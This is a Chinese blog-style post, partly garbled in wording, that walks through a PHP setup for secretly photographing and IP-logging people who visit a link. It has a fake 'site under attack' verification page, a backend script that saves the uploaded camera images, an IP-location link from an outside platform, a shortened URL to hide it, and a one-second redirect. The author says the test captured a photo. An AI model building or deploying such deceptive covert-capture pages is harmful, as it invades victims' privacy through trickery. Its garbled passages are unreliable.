利用php记录网站攻击者桌面照片和ip地址,可以记录IP,顺手偷窥反击对象,看一看他短啥样!
因为事先已经有了IP记录平台,所以便利省事,轻易已经开始研究偷拍
随手写下了偷窥页面前端,假造的受到攻击验证(将就看看,毕竟只是做一次模拟)
前端代码
人机检验机制 目前平台正在遭遇攻击!
表明非正常请采用uc浏览器出访!
jishu.php
后端代码
<?php error_reporting(0); $base64_img = trim($_POST['img']); $up_dir = './upload/';//存放在当前目录的upload文件夹下 if(!file_exists($up_dir)){ mkdir($up_dir,0777); } if(preg_match('/^(data:s*image/(w+);base64,)/', $base64_img, $result)){ $type = $result[2]; if(in_array($type,array('pjpeg','jpeg','jpg','gif','bmp','png'))){ $new_file = $up_dir.date('YmdHis_').'.'.$type; if(file_put_contents($new_file, base64_decode(str_replace($result[1], '', $base64_img)))){ $img_path = str_replace('../../..', '', $new_file); echo '网站正在遭受反击,恳请稍后访问'; } } }
绑定域名并存放至根目录前往ip.heibai.org生成定位链接
(因为平台都是我的,所以我可以民主自由修正定位链接内容!!!如果必须课堂教学定位链接恳请自行构建)
马赛克部分为偷窥地址,设置1秒重定向
百度长网址生成链接,已经开始测试阶段
IP记录成功,接下来就是激动人心的时刻,看看与否偷拍成功
查看了我的图片存放目录,顺利了的
嗯,对,证明我的思路就是可行的。